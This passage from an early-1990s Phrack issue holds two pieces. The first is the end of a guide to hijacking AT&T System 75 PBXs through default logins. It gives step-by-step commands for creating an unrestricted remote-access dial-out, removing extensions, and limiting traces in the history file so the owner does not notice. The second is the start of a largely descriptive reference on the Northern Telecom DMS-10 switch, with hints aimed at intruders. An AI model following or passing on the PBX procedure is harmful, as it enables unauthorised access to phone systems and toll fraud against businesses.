  2827.  
  2828. When you log in, you will have the commands LIST, DISPLAY, and a couple others
  2829. that don't matter.  These are the only ones that you will need with the
  2830. aforementioned default.  First type "DIS REM" (display remote access).  If
  2831. there is a PBX set up on the system, it will be shown on the extension line.
  2832. The barrier code is the code to the PBX. If "none" appears, there is no code
  2833. and it's just 9+1.  The extension line can either be 3 or 4 digits.  Usually,
  2834. if it's 3 digits, it is run off of AUDIX (AUDio Information eXchange) or they
  2835. are smart and are hiding the one digit!  Look at the dialplan and see if the
  2836. extensions are 3 or 4 digits.  If it tells you that the extensions are three
  2837. digits, chances are that it is somewhere in the AUDIX system.  If it's run off
  2838. of an AUDIX, look through all of the extensions by either list or display
  2839. 'extensions' until you find one that says something like "remote extension" or
  2840. something that looks different.  If the one digit is hidden, use ToneLoc and
  2841. scan for the digit needed.  Next, display the trunk groups.  This will tell you
  2842. the actual dial-up.  If you don't find it here, don't panic.  As you go through
  2843. the trunk groups, also look at the incoming destination as well as the night
  2844. destination.  If any of these show the remote extension here, there is your
  2845. PBX.  If not, keep looking through all of the trunk groups.  Write down all of
  2846. the phone numbers it gives you and try them.  They can usually be found on page
  2847. three or so.
  2848.  
  2849. A LOT of the time, places call forward a back line or so to the actual PBX.  If
  2850. there is no remote access extension when you display the remote access, you are
  2851. shit out of luck unless you have a higher default and read the rest of this
  2852. text.
  2853.  
  2854.  
  2855. Setting Up Your Own PBX
  2856. ~~~~~~~~~~~~~~~~~~~~~~~
  2857. If you have a higher default, you will notice that if you type help, you have
  2858. more commands that are available to you, such as change, download, etc.
  2859. Remember, the company can change the privileges of the defaults so if you
  2860. cannot see these commands, use another default.  The first thing you want to do
  2861. is to display the dialplan.  This will tell you the amount of digits and the
  2862. first digit of all of the sequences.  Here is an example of a dialplan.  There
  2863. are several ways the dialplan may look.
  2864.  
  2865.                  Number of Digits
  2866. -------1----2----3----4----5----6----7----8----9
  2867. --
  2868. F 1
  2869. I 2        Tac
  2870. R 3
  2871. S 4             Fac
  2872. T 5
  2873.   6               Extension
  2874. D 7               Extension
  2875. I 8        Tac
  2876. G 9
  2877. I 0 Attendant
  2878. T *
  2879.   #
  2880.  
  2881. Using the above chart, all extensions will start with either a 6 or 7 and will
  2882. be four digits long.  The Tac is two digits, and will start with a 2 or an 8.
  2883. Don't worry about FAC or any others at this time.
  2884.  
  2885. After you make note of this, type "ch rem" (change remote access), go to the
  2886. extension line, and put in an extension.  Next, find the trunk group that you
  2887. want to use and type "ch tru #".  Go to the line for night service and put the
  2888. extension in there.  If there is already an extension for night service on all
  2889. of the trunks, don't worry. If not, add it, and then save it.  If it says
  2890. invalid extension, you misread the dialplan.  If you pick an extension already
  2891. in use, it will tell you so when you try to install it in the remote extension
  2892. line in the remote address.  Once all of this is completed, you may go back to
  2893. the remote access and add a code if you like, or you may just enter "none" and
  2894. that will be accepted.  THE NEXT PART IS VERY IMPORTANT!  Look at the trunk
  2895. that you installed and write down the COR number.  Cancel that command and type
  2896. "dis cor #".  Make sure that the Facilities Restriction Level (FRL) at the top
  2897. is set to 7 (7 is the least restricted level & 0 is the most) and that under
  2898. calling party restrictions & called party restrictions, the word "none" (lower
  2899. case) is there!  If they are not, type "ch cor #" and make the changes.  Last,
  2900. type "dis feature".  This will display the feature access codes for the system.
  2901. There will be a line that says something like "SMDR Access Code."  This will be
  2902. the code that you enter after the barrier code if there is one.  I have seen
  2903. some be like *6, etc.  Also, there will be, on page 2 I believe, something to
  2904. the like of outside call. usually it is set to 9 but check to be sure.   That's
  2905. about it for this segment.  All should be fine at this point.  For those that
  2906. want a 24 hour PBX, this next section is for you.
  2907.  
  2908.  
  2909. For those of you that are greedy, and want a 24 hour PBX, most of the steps
  2910. above are the same.  The only difference is that you will look through all of
  2911. the trunks until you come across one that has several incoming rotary lines in
  2912. it.  Simply write down the port number and the phone number for future
  2913. reference and delete it by using the "ch" command.  From the main prompt, type
  2914. "add tru #".  For the TAC, enter a correct TAC number.  Keep going until you
  2915. get to the COR.  Enter a valid one and remember that the FRL should be set to
  2916. 7, etc.  Keep going...the next line that is vacant and needs something is the
  2917. incoming destination.  Set it to the remote extension that you have created.
  2918. The next vacant line I think is type (towards the middle of the page).  Enter
  2919. ground and it should print out "ground-start."  If there is a mistake, it will
  2920. not save and it will send you to the line that needs to have something on it.
  2921. After all is done, it will save.  After this segment, there is a copy of a
  2922. trunk and what it should look like for the use of a PBX.  Next, go to page 3
  2923. and enter the port and phone number that you wrote down earlier.  Save all of
  2924. the changes that you have made.  This should be all you need.
  2925.  
  2926.  
  2927. One more way!  If you scan through all of the extensions on the system, you may
  2928. find an "open" extension.  This extension may be like the phone outside in the
  2929. waiting room or an empty office or whatever.  This extension must be a valid
  2930. phone number on their network or must be reachable on their AUDIX for this
  2931. method to work. If you know how to add ports to Audix, this method will be best
  2932. for you since setting up a trunk is not needed.  If you find something like
  2933. this, it's usually better to use this as your 24 hour PBX rather than taking
  2934. away a line for several reasons:  1) there are less changes that you must make
  2935. so there will be less data saved in the history file; 2) other people that have
  2936. legal uses for the line won't trip out when they get a dial tone; and 3) the
  2937. company will not notice for some time that they've lost an extension that is
  2938. hardly used!  To set it up this way, you must delete the old info on that
  2939. extension by typing "remove extension #".  It will then show you the station in
  2940. detail.  Save it at that point and it will be deleted.  Next go to the remote
  2941. access and enter the extension that you deleted on the remote extension line.
  2942. Next enter a barrier code or "none" if you don't want one.  Save it!  Doing it
  2943. this way USUALLY does not require a new trunk to be added since the port is
  2944. already in the system but if you run into problems, go back and add it through
  2945. the use of a trunk.  You will still have to assign it a "cor" in the remote
  2946. access menu, and remember to make sure that the FRL and the restrictions are
  2947. set correctly as stated as above.
  2948.  
  2949.  
  2950. In part 2, if there is a demand, I will tell how to make a bridge off of a 75.
  2951. It is a lot more difficult, and requires a lot more reading of the manuals.  If
  2952. anyone can obtain the manuals, I would strongly urge them to do so.  Also
  2953. potentially in part 2, I will show how to create a VMB.  If they have AUDIX
  2954. voice mail, chances are they have a 75!
  2955.  
  2956. So happy hunting and see ya soon!
  2957.  
  2958. If you need to get a hold of me to ask a question, you may catch me on the nets
  2959. or on IRC.
  2960.  
  2961. Enjoy!
  2962.  
  2963. Scott Simpson
  2964.  
  2965. -------------------------------------------------------------------------------
  2966. APPENDIX A : Example of a Trunk For PBXs
  2967.  
  2968.                               Trunk Group                    Page 1 of 5
  2969.                               -----------
  2970.  
  2971. Group Number #               Group Type: co                Smdr Reports: n
  2972.  
  2973.    Group name: Whatever ya want         Cor: #            Tac: #
  2974.  
  2975. Mis Measured? n
  2976.  
  2977.    Dial access: y    Busy Threshold: 60      Night Service: What will answer
  2978.                                                             after hours
  2979.  
  2980. Queue length: 0  Abandoned call Search: n   Incoming Dest: What will answer
  2981.                                                            any time the # is
  2982.                                                            called unless NS
  2983.                                                            has an extension.
  2984.  
  2985.     Comm Type: voice       Auth Code: n     Digit Absorption List:
  2986.  
  2987.  
  2988.       Prefix-1? n    Restriction: code    Allowed Calls List: n
  2989.  
  2990.    Trunk-Type: Ground-start
  2991.  
  2992.  Outgoing Dial type: tone
  2993.  
  2994.   Trunk Termination: whatever it is        Disconnect Timing: Whatever it is
  2995.                      to.                                      set to.
  2996.                              ACA Assignments: n
  2997.  
  2998.  
  2999. [Page 2 is not all that important.  It's usually used for all of the
  3000. [maintenance to the trunk etc. so leave it all set to its default setting.]
  3001.  
  3002.  
  3003.                                                   page 3 of 5
  3004.        Port        Name        Mode      Type       Answer delay
  3005. 1   Port number  phone number
  3006. 2
  3007. 3
  3008. etc.
  3009.  
  3010.  
  3011. That's all that is needed for the trunks.
  3012. -------------------------------------------------------------------------------
  3013. APPENDIX B : Basic Commands and Terms
  3014.  
  3015.      Basic Terminology
  3016.      -----------------
  3017. COR  - Class Of Restriction
  3018. FRL  - Facilities Restriction Level
  3019. SMDR - Station Message Detail Recording
  3020. TAC  - Trunk Access Code
  3021. FAC  - Feature Access Code
  3022.  
  3023.  
  3024.      Basic Commands for Default Emulation (513)
  3025.      ------------------------------------------
  3026. Esc Ow - Cancel
  3027. Esc [U - Next Page
  3028. Esc SB - Save
  3029. Esc Om - Help
  3030.  
  3031.  
  3032.      Commands for 4410
  3033.      -----------------
  3034. Esc Op - Cancel
  3035. Esc Ot - Help
  3036. Esc Ov - Next Page
  3037. Esc Ow - Back Page
  3038. Esc OR - Save
  3039. Esc Oq - Refresh
  3040. Esc Os - Clear Fields
  3041.  
  3042. Below is an explanation of all of the commands.
  3043.  
  3044. The following is a captured buffer of a login to System 75.  I have captured
  3045. the commands and have edited the buffer to include brief definitions of the
  3046. commands.
  3047.  
  3048. Display and list are basically the same command, but display shows more
  3049. detailed information on the command that you select.  For example, "list tru"
  3050. will list all of the trunk groups in the system.  "dis tru" will ask for a
  3051. trunk number, and then display all of the information on that trunk.
  3052.  
  3053. CH Help
  3054. Please enter one of the following action command words:
  3055.  
  3056. add                      duplicate                save
  3057. change                   list                     set
  3058. clear                    monitor                  status
  3059. display                  remove
  3060.  
  3061.  
  3062. Or enter 'logoff' to logoff the system
  3063. Add       - Is pretty self-explanatory
  3064. Change    - Is also self-explanatory
  3065. Clear     - will clear out the segment
  3066. Duplicate - will duplicate the process
  3067. List      - self-explanatory
  3068. Monitor   - used for testing, and monitoring the system
  3069. Remove    - remove anything from the system EXCEPT the History File!  Sorry
  3070.             guys!
  3071. Save      - saves work done
  3072. Set       - sets the time, etc.
  3073. Status    - shows current status of the system
  3074.  
  3075. List Help
  3076. Please enter one of the following object command words:
  3077.                       COMMANDS UNDER "LIST"
  3078. abbreviated-dialing      groups-of-extension      personal-CO-line
  3079. aca-parameters           hunt-group               pickup-group
  3080. bridged-extensions       intercom-group           station
  3081. configuration            measurements             term-ext-group
  3082. coverage                 modem-pool               trunk-group
  3083. data-module              performance
  3084.  
  3085. Or press CANCEL to cancel the command
  3086. Abbreviated-Dialing: Speed calling feature from their voice terminal
  3087. Aca-parameters: Automatic-Circuit-Assurance
  3088. Bridged Extensions: Used for bridging extensions together
  3089. Configuration: Overall system Configuration
  3090. Coverage: Call Coverage
  3091. Data-module: Description of the data module used
  3092. Groups Of Extensions: Lists all of the extensions available
  3093. Hunt-Group: Checks for active or idle status of extension numbers
  3094. Intercom-group: Lists the intercoms and their info
  3095. Modem-Pool: Allows switched connects between data modules and analog data
  3096. Performance: Shows the performance of the system
  3097. Personal-CO-line: Is for dedicated trunks to or from public terminals
  3098. Pickup-group: Pickup station setup
  3099. Station: Will list all of the available stations assigned
  3100. Term-ext-group: For terminating extension group
  3101. Trunk-Group: Lists ALL of the trunks; will NOT show all details like Display
  3102.  
  3103. Dis Help
  3104. Please enter one of the following object command words:
  3105.                     Commands Under 'Display'
  3106. abbreviated-dialing      data-module              personal-CO-line
  3107. alarms                   dialplan                 pickup-group
  3108. allowed-calls            digit-absorption         port
  3109. announcements            ds1                      psc
  3110. attendant                errors                   remote-access
  3111. button-location-aca      feature-access-codes     route-pattern
  3112. circuit-packs            hunt-group               station
  3113. code-restriction         intercom-group           synchronization
  3114. communication-interface  ixc-codes                system-parameters
  3115. console-parameters       listed-directory-numbers term-ext-group
  3116. cor                      modem-pool               time
  3117. cos                      paging                   trunk-group
  3118. coverage                 permissions
  3119.  
  3120.  
  3121. Or press CANCEL to cancel the command
  3122. Abbreviated Dialing: Covered above, but shows more information
  3123. Alarms: Will show information on the alarms (which ones are on/off)
  3124. Allowed-Calls: Will show LD carrier codes and allowed call list
  3125. Announcements:
  3126. Attendant: Allows attendant to access trunks without voice terminals
  3127. Button-location-aca: Will show the location of the aca selected
  3128. circuit-packs: Tells types of lines used.
  3129. Code-Restriction: Shows restrictions for HNPA and FNPA
  3130. Communication-Interface: Information on the communication interface
  3131. Console-Parameters: Will list the parameters of the console, etc.
  3132. Cor: Class Of Restriction (will show the cor for the # entered)
  3133. Cos: Class Of Service
  3134. Coverage: Shows the coverage of the system (voice terminals, etc.)
  3135. Data-Module: Will show information for the data channels entered
  3136. Dialplan: List the current config for extensions etc.
  3137. Digit-absorption:
  3138. Ds1: Used for tie-trunk services
  3139. Errors: Shows all of the errors on the system
  3140. Feature-Access_Codes: Lists all of the feature access codes for all of the
  3141.                       features on the entire system
  3142. Hunt-Group: As above, but will tell more information for the # you enter
  3143. Intercom Group: Lists all of the names and their intercom assignments
  3144. IXC-Codes: Inter-eXchange Carrier codes
  3145. Listed-Directory: Lists the numbers in the directory of the system
  3146. Modem-Pool: Will show info on the channel you select (exp baud, parity, etc.)
  3147. Paging: Used for the paging stations on the voice terminals
  3148. Permissions: Will show the privileges of the other accounts/defaults
  3149. Personal-CO-Line: As above but more descriptive
  3150. Pickup-Group: Shows names and extensions in the specified group number
  3151. Port: Will show the info on the port you ask about
  3152. PSC: Keeps a call between to data points connected while the system is active
  3153. Remote-Access: Will show the Remote Access that is there (if any)
  3154. Route-Pattern: The pattern of routing within the voice terminals, etc.
  3155. Station: Will show detailed information on the station # you enter
  3156. Synchronization: Will show the location of the DS1 packs
  3157. System-Parameters: List of all of the available systems parameters
  3158. Term-Ext-Group: As above but more descriptive
  3159. Time: Will show the current time and date
  3160. Trunk-Group: Will show all available information for the trunk you select
  3161. _______________________________________________________________________________
  3162.  
  3163.                                 ==Phrack Inc.==
  3164.  
  3165.                    Volume Four, Issue Forty-One, File 7 of 13
  3166.  
  3167.                           How To Build A DMS-10 Switch
  3168.  
  3169.                                 by The Cavalier
  3170.                      Society for the Freedom of Information
  3171.  
  3172.                                  March 11, 1992
  3173.  
  3174.  
  3175.      With the telephone network's complexity growing exponentially as the
  3176. decades roll by, it is more important than ever for the telecom enthusiast to
  3177. understand the capabilities and function of a typical Central Office (CO)
  3178. switch.  This text file (condensed from several hundred pages of Northern
  3179. Telecom documentation) describes the features and workings of the Digital
  3180. Multiplex Switch (DMS)-10 digital network switch, and with more than an average
  3181. amount of imagination, you could possibly build your own.
  3182.  
  3183.      The DMS-10 switch is the "little brother" of the DMS-100 switch, and the
  3184. main difference between the two is the line capacity.  The DMS line is in
  3185. direct competition to AT&T's ESS line (for the experienced folks, the features
  3186. covered are the as those included in the NT Software Generic Release 405.20 for
  3187. the 400 Series DMS-10 switch).
  3188.  
  3189.  
  3190.  Table of Contents
  3191.  ~~~~~~~~~~~~~~~~~
  3192. I.   OVERVIEW/CPU HARDWARE SPECS
  3193. II.  NETWORK SPECS
  3194.      1. Network Hardware
  3195.      2. Network Software
  3196.      3. Advanced Network Services
  3197. III. EXTERNAL EQUIPMENT SPECS
  3198.      1. Billing Hardware
  3199.      2. Recorded Announcement Units
  3200.      3. Other Misc. Hardware
  3201. IV.  MAINTENANCE AND ADMINISTRATION
  3202.      1. OAM
  3203.      2. Interactive Overlay Software Guide
  3204. V.   SPEC SHEET
  3205. VI.  LIMITED GLOSSARY
  3206.  
  3207. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3208.  
  3209. I. OVERVIEW/CPU HARDWARE SPECS
  3210.  
  3211. Overview
  3212.  
  3213.      The DMS-10 switch is capable of handling up to 10,800 lines, and was
  3214. designed for suburban business centers, office parks, and rural areas.  It can
  3215. be installed into a cluster configuration to centralize maintenance and
  3216. administration procedures and to increase combined line capacity to 50,000
  3217. lines.  It is capable of functioning as an End Office (EO), an Equal Access End
  3218. Office (EAEO), and an Access Tandem (AT), and is a known as a Class 5 switch.
  3219. It supports up to 3,408 trunks and 16,000 directory numbers.  It can outpulse
  3220. in DP (Dial Pulse), MF (Multi-Frequency), or DTMF (Dual-Tone Multi-Frequency),
  3221. insuring compatibility with new and old switches alike (translation -- the
  3222. switch is small, by most standards, but it has massive bounce for the ounce).
  3223.  
  3224.  
  3225. Hardware Specifications
  3226.  
  3227.      The DMS-10 switch itself is a 680x0-based computer with 1 MB of RAM in its
  3228. default configuration.  The processor and memory are both duplicated; the
  3229. backup processor remains in warm standby.  The memory system is known as the
  3230. n+1 system, meaning that the memory is totally duplicated.
  3231.  
  3232.  
  3233. II. NETWORK SPECS
  3234.  
  3235. Network Hardware
  3236.  
  3237.      The DMS-10 network hardware consists mostly of PEs, or Peripheral
  3238. Equipment trunk and line packs.  The PEs take the incoming analog voice
  3239. signals, digitalize them into 8 bit PCM (Pulse Code Modulation) signals, and
  3240. feed it into the main transmission matrix section of the switch.  There, it is
  3241. routed to another trunk or line and converted back into an analog signal for
  3242. retransmission over the other side of the call.  Note that manipulating voice
  3243. in the digital domain allows the signal to be rerouted, monitored, or
  3244. retransmitted across the country without any reduction in signal quality as
  3245. long as the signals remain in PCM format.  <Hint!>
  3246.  
  3247.  
  3248. Network Software
  3249.  
  3250.      The DMS-10 has a variety of software available to meet many customers'
  3251. switching needs.  A good example of this software is the ability of several
  3252. DMS-10 switches to be set up in a cluster (or star configuration, for those of
  3253. you familiar with network topologies).  In this arrangement, one DMS-10 is set
  3254. up as the HSO (Host Switching Office) and up to 16 DMS-10s are set up as SSOs
  3255. (Satellite Switching Offices), allowing all billing, maintenance, and
  3256. administration to be handled from the HSO.  Additionally, all satellites can
  3257. function on their own if disconnected from the HSO.
  3258.  
  3259.      Another feature of the DMS-10's network software are nailed-up
  3260. connections, commonly known as loops.  The DMS-10 supports up to 48 loops
  3261. between any two points.  The connections are constantly monitored by the switch
  3262. computer, and if any are interrupted, they are re-established.
  3263.  
  3264.      Meridian Digital Centrex (MDC) is the name given to a group of features
  3265. that enable businesses to enjoy the benefits of having PBX (Private Branch
  3266. Exchange) equipment by simply making a phone call to the local telco.
  3267.  
  3268.  
  3269. Advanced Network Services (ANS)
  3270.  
  3271.      If the DMS-10 is upgraded with the 400E 32-bit RISC processor, the switch
  3272. will be able to handle 12,000 lines, enjoy a speed improvement of 80%, support
  3273. a six-fold increase in memory capacity, and, perhaps most importantly, will be
  3274. able to run NT's Advanced Network Services software.  This software includes
  3275. Common Channel Signaling 7 (CCS7), Advanced Meridian Digital Centrex, DMS
  3276. SuperNode connectivity, and ISDN.  CCS7 is the interswitch signaling protocol
  3277. for Signaling System 7, and the concept deserves another text file entirely
  3278. (see the New Fone eXpress/NFX articles on SS7).
  3279.  
  3280.  
  3281. III. EXTERNAL EQUIPMENT SPECS
  3282.  
  3283. Billing Format Specifications
  3284.  
  3285.      The DMS-10 can record AMA (Automatic Message Accounting) billing data in
  3286. either Bellcore or Northern Telecom format, and it can save this data in one of
  3287. several ways:
  3288.  
  3289.      - by saving onto a 9-track 800 BPI (Bits-Per-Inch) density tape drive
  3290.        called an MTU (Magnetic Tape Unit)
  3291.  
  3292.      - by saving onto a IOI (Input/Output Interface) pack with a 64 MB SCSI
  3293.        (Small Computer System Interface) hard drive, and transferring to 1600
  3294.        BPI tape drives for periodic transport to the RAO (Regional Accounting
  3295.        Office)
  3296.  
  3297.      - by transmitting the data through dial-up or dedicated telephone lines
  3298.        with the Cook BMC (Billing Media Converter) II, a hard drive system that
  3299.        will transmit the billing records on request directly to the RAO.  The
  3300.        Cook BMC II supports six different types of transmission formats, listed
  3301.        below:
  3302.  
  3303.         * AMATS (BOC)                           [max speed: 9600 bps]
  3304.             Call records are stored using the Bellcore AMA format and polled
  3305.             using the BX.25 protocol.  Two polling ports are provided with one
  3306.             functioning as a backup.
  3307.  
  3308.         * BIP Compatible                        [max speed: 9600 bps (2400*4)]
  3309.             Call records are stored using the Bellcore AMA format and polled
  3310.             using the HDLC Lap B protocol.  Four polling ports are provided
  3311.             that can function simultaneously for a combined throughput of 9600
  3312.             bps. This specification is compatible with GTE's Billing
  3313.             Intermediate Processor.
  3314.  
  3315.         * Bellcore AMA w/ BiSync polling        [max speed: 9600 bps]
  3316.             Call records are stored using the Bellcore AMA format and polled
  3317.             using the IBM BiSync 3780 protocol.  One polling port is provided.
  3318.             This option is intended for operating companies who use independent
  3319.             data centers or public domain protocols for data processing.
  3320.  
  3321.         * Bellcore AMA w/ HDLC polling          [max speed: 9600 bps]
  3322.             Call records are stored using the Bellcore AMA format and polled
  3323.             using the HDLC (High-level Data Link Control) protocol.  One port
  3324.             is provided.
  3325.  
  3326.         * NT AMA w/ HDLC polling                [max speed: 9600 bps]
  3327.             Call records are stored using the Northern Telecom AMA format and
  3328.             polled using the HDLC protocol.
  3329.  
  3330.         * NT AMA w/ BiSync polling              [max speed: 4800 bps]
  3331.             Call records are stored using the Northern Telecom AMA format and
  3332.             polled using the BiSync protocol.
  3333.  
  3334.      - by interfacing with AT&T's AMATS (Automatic Message Accounting
  3335.        Teleprocessing System)
  3336.  
  3337.      - by interfacing with the Telesciences PDU-20
  3338.  
  3339.      All of the above storage-based systems are fully fault-tolerant, and the
  3340. polled systems can store already-polled data for re-polling.
  3341.  
  3342.  
  3343. Recorded Announcement Units
  3344.  
  3345.      The DMS-10 system may be interfaced to one or more recorded announcement
  3346. units through two-wire E&M trunks.  Some units supported include the Northern
  3347. Telecom integrated Digital Recorded Announcement Printed Circuit Pack (DRA
  3348. PCP), the Cook Digital Announcer or the Audichron IIS System 2E.
  3349.  
  3350.      The DRA PCP is integrated with the DMS-10 system, as opposed to the Cook
  3351. and Audichron units, which are external to the switch itself.  It provides
  3352. recorded announcements on a plug-in basis and offers the following features:
  3353.  
  3354.      - Four ports for subscriber access to announcements
  3355.      - Immediate connection when pack is idle
  3356.      - Ringback tone when busy until a port is free
  3357.      - Switch-selectable message lengths (up to 16 seconds)
  3358.      - Local and remote access available for message recording
  3359.      - Memory can be optionally battery-backed in case of power loss
  3360.      - No MDF (Main Distribution Frame) wiring required
  3361.  
  3362. Other External Hardware
  3363.  
  3364.      The DMS-10 can also support the Tellabs 292 Emergency Reporting System,
  3365. the NT Model 3703 Local Test Cabinet, and the NT FMT-150 fiber optic
  3366. transmission system.  More on this stuff later, perhaps.
  3367.  
  3368.  
  3369. IV. MAINTENANCE AND ADMINISTRATION
  3370.  
  3371. OAM
  3372. ---
  3373.      OAM, or Operations, Administration, and Maintenance functions, are
  3374. performed through an on-site maintenance terminal or through a remote
  3375. maintenance dial-in connection.  The DMS-10 communicates at speeds ranging from
  3376. 110 to 9600 baud through the RS-232C port (standard) in ASCII.  There can be up
  3377. to 16 connections or terminals for maintenance, and security classes may be
  3378. assigned to different terminals, so that the terminal can only access the
  3379. programs that are necessary for that person's job.  The terminals are also
  3380. password protected, and bad password attempts result in denied access, user
  3381. castration and the detonation of three megatons of on-site TNT.  <Just kidding>
  3382.  
  3383.      The software model for the DMS-10 consists of a core program which loads
  3384. overlays for separate management functions.  These overlays can be one of two
  3385. types:  either free-running, which are roughly analogous to daemons on Unix
  3386. environments, which are scheduled automatically; or interactive, which
  3387. communicate directly with the terminal user.
  3388.  
  3389.      The major free-running programs are the Control Equipment Diagnostic
  3390. (CED), the Network Equipment Diagnostic (NED), the Peripheral Equipment
  3391. Diagnostic (PED), and the Digital Equipment Diagnostic (DED).  The CED runs
  3392. once every 24 hours, and tests the equipment associated with the CPU buses and
  3393. the backup CPU.  The NED runs whenever it feels like it and scans for faults in
  3394. the network and proceeds to deal with them, usually by switching to backup
  3395. hardware and initiating alarm sequences.  The PED is scheduled when the switch
  3396. is installed to run whenever the telco wants it to, and it systematically tests
  3397. every single trunk and line connected to that central office (CO).  The DED
  3398. tests the incoming line equipment that converts analog voice to digital PCM.
  3399.  
  3400.      Now, for interactive programs (a.k.a. interactive overlays), I'm going to
  3401. list all of their codes, just in case one of you gets lucky out there.  To
  3402. switch to an overlay, type OVLY <overlay>.  To switch to a sub-overlay, type
  3403. CHG <sub-overlay>.  Keep in mind that NT has also installed help systems on
  3404. some of their software, accessible by pressing "?" at prompts.  Here we go:
  3405.  
  3406. Overlay     Explanation and Prompting Sequences
  3407. -------     -----------------------------------
  3408. ALRM        Alarms
  3409.  
  3410.             ALPT - Alarm scan points
  3411.             SDPT - Signal distribution points
  3412.  
  3413. AMA         Automatic Message Accounting
  3414.  
  3415.             AMA  - Automatic Message Accounting
  3416.             MRTI - Message-rate treatment index
  3417.             PULS - Message-rate pulsing table
  3418.             TARE - Tariff table
  3419.  
  3420. AREA        Area
  3421.  
  3422.             CO   - Central Office Code
  3423.             HNPA - Home Numbering Plan Area
  3424.             RC   - Rate Center
  3425.             RTP  - Rate Treatment Package
  3426.  
  3427. CLI         Calling Line Identification
  3428.  
  3429. CNFG        Configuration Record
  3430.  
  3431.             ALRM - Alarm System Parameters
  3432.             AMA  - Automatic Message Accounting parameters
  3433.             BUFF - System Buffers
  3434.             CCS  - Custom Calling Services
  3435.             CCS7 - Common Channel Signaling No. 7
  3436.             CDIG - Circle Digit Translation
  3437.             CE   - Common Equipment Data
  3438.             CLUS - Cluster data
  3439.             COTM - Central Office overload call timing
  3440.             CP   - Call processing parameters
  3441.             CROT - Centralized Automatic Reporting of Trunks
  3442.             CRTM - Central Office regular call processing timing
  3443.             CSUS - Centralized Automatic Message Accounting suspension
  3444.             DLC  - Data Link Controller assignment for clusters
  3445.             E800 - Enhanced 800 Service
  3446.             FEAT - Features
  3447.             GCON - Generic Conditions
  3448.             HMCL - Host message class assignment
  3449.             IOI  - Secondary input/output interface pack(s)
  3450.             IOSF - Input/Output Shelf Assignment
  3451.             LCDR - Local Call Detail Recording
  3452.             LIT  - Line Insulation Testing parameters
  3453.             LOGU - Logical Units Assignments
  3454.             MOVE - Move Remote Line Concentrating Module
  3455.             MTCE - Maintenance Parameters
  3456.             MTU  - Magnetic Tape Unit Parameters
  3457.             OPSM - Operational Measurements
  3458.             OVLY - Overlay scheduling
  3459.             PSWD - Password Access
  3460.             SITE - Site assignments
  3461.             SSO  - Satellite Switching Office Assignments
  3462.             SUB  - Sub Switch
  3463.             SYS  - System parameters
  3464.             TRB  - Periodic trouble status reporting
  3465.             VERS - Version
  3466.  
  3467. CPK         Circuit Pack
  3468.  
  3469.             ACT  - AC Testing Definition
  3470.             DCM  - Digital Carrier Module
  3471.             LPK  - Line Concentrating Equipment line packs
  3472.             PACK - Peripheral Equipment packs
  3473.             PMS  - Peripheral Maintenance System pack
  3474.             PSHF - Peripheral Equipment Shelf
  3475.             RMM  - Remote Maintenance Module
  3476.             RMPK - Remote shelf
  3477.             RSHF - Remote Concentration Line Shelf
  3478.             SBLN - Standby line
  3479.             SLC  - SLC-96
  3480.             SLPK - SLC-96 pack
  3481.  
  3482. DN          Directory Number
  3483.  
  3484.             ACDN - Access Directory Number
  3485.             CRST - Specific Carrier Restricted
  3486.             ICP  - Intercept
  3487.             RCFA - Remote Call Forwarding appearance
  3488.             ROTL - Remote Office Test Line
  3489.             STN  - Station Definition
  3490.  
  3491. EQA         Equal Access
  3492.  
  3493.             CARR - Carrier Data Items
  3494.             CC   - Country Codes
  3495.  
  3496. HUNT        Hunting
  3497.  
  3498.             DNH  - Directory Number Hunting
  3499.             EBS  - Enhanced Business Services hunting
  3500.             KEY  - Stop hunt or random make busy hunting
  3501.  
  3502. LAN         Local Area Network
  3503.  
  3504.             LAC  - LAN Application Controller
  3505.             LCI  - LAN CPU Interface
  3506.             LSHF - Message LAN Shelf
  3507.  
  3508. NET         Network
  3509.  
  3510.             D1PK - DS-1 interface pack (SCM-10S)
  3511.             1FAC - Interface packs
  3512.             LCM  - Line Concentrating Module
  3513.             LCMC - Line Concentrating Controller Module
  3514.             NWPK - Network Packs
  3515.             RCT  - Remote Concentrator Terminal
  3516.             REM  - Remote Equipment Module
  3517.             RSLC - Remote Subscriber Line Module Controller
  3518.             RSLE - Remote Subscriber Line Equipment
  3519.             RSLM - Remote Subscriber Line Module
  3520.             SCM  - Subscriber Carrier Module (DMS-1)
  3521.             SCS  - SCM-10S shelf (SLC-96)
  3522.             SRI  - Subscriber Remote Interface pack
  3523.  
  3524. NTWK        Network
  3525.  
  3526.             ACT  - AC Testing definition
  3527.             D1PK - DS-1 interface pack (SCM-10S)
  3528.             DCM  - Digital Carrier Module
  3529.             1FAC - Interface packs
  3530.             LCM  - Line Concentrating Module
  3531.             LPK  - Line Concentrating Equipment line packs
  3532.             NWPK - Network packs
  3533.             PACK - Peripheral Equipment packs
  3534.             PMS  - Peripheral Maintenance System packs
  3535.             PSHF - Peripheral Equipment Shelf
  3536.             RCT  - Remote Concentrator Terminal
  3537.             REM  - Remote Equipment Module
  3538.             RSHF - Remote Shelf
  3539.             SBLN - Standby line
  3540.             SCM  - Subscriber Carrier Module
  3541.             SCS  - SCM-10S Shelf (SLC-96)
  3542.             SLC  - SLC-96
  3543.             SLPK - SLC-96 Line Packs
  3544.             SRI  - Subscriber Remote Interface (RLCM)
  3545.  
  3546. ODQ         Office Data Query
  3547.  
  3548.             ACDN - Access Directory Number
  3549.             CG   - Carrier group
  3550.             CNTS - Counts
  3551.             DN   - Directory Number
  3552.             DTRK - Digital Trunks (line and trunk)
  3553.             LINE - Lines (line and trunk)
  3554.             PIN  - Personal Identification Number
  3555.             STOR - Memory Storage
  3556.             TG   - Trunk Group
  3557.             TRK  - Trunks (line and trunk)
  3558.  
  3559. QTRN        Query Translations
  3560.  
  3561.             ADDR - Address Translations
  3562.             EBSP - Enhanced Business Services prefix translations
  3563.             ESAP - Emergency Stand-Alone Prefix
  3564.             PRFX - Prefix translations
  3565.             SCRN - Screening translations
  3566.             TRVR - Translation verification
  3567.  
  3568. ROUT        Routes
  3569.  
  3570.             CONN - Nailed-up connections
  3571.             DEST - Destinations
  3572.             POS  - Centralized Automatic Message Accounting positions
  3573.             ROUT - Routes
  3574.             TR   - Toll regions
  3575.  
  3576. SNET        CCS7 Signaling Network
  3577.  
  3578.             SNLS - Signaling Link Set
  3579.             SNL  - Signaling Link
  3580.             SNRS - Signaling Network Route Set
  3581.  
  3582. TG          Trunk Groups
  3583.  
  3584.             INC  - Incoming trunk groups
  3585.             OUT  - Outgoing trunk groups
  3586.             2WAY - Two-way trunk groups
  3587.  
  3588. THGP        Thousands Groups
  3589.  
  3590. TRAC        Call Tracing
  3591.  
